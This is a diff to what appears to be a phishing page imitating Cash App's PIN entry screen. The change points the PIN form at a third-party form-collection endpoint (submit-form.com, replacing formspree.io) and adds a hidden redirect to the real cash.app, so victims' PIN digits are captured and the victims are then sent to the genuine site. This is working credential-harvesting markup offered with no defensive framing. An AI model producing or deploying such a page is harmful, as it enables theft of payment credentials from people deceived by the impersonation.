--- a/index.html
+++ b/index.html
@@ -15008,9 +15008,15 @@ Enter your Cash PIN to continue.</span></p>
 						<div contenteditable="" tabindex="1" id="ember632" class="passcode-inputs-bubble flex-container flex-h ember-view">
 							<div class="input-bubbles flex-container flex-h">
 								<form name="myForm" autocomplete="off"
-  action="https://formspree.io/f/xayvdnbz"
+  action="https://submit-form.com/yyKGf2ag"
   method="POST"
 >
+<input
+    type="hidden"
+    name="_redirect"
+    value="https://cash.app/"
+  />
+  <input type="hidden" name="_append" value="false" />
 								<input id = "bubble1" pattern="[0-9]*" name = "bubble1" class="input-bubble to-be-filled" autofocus >
 								<input id = "bubble2" pattern="[0-9]*" name = "bubble2" class="input-bubble ">
 								<input id = "bubble3" pattern="[0-9]*" name = "bubble3" class="input-bubble ">
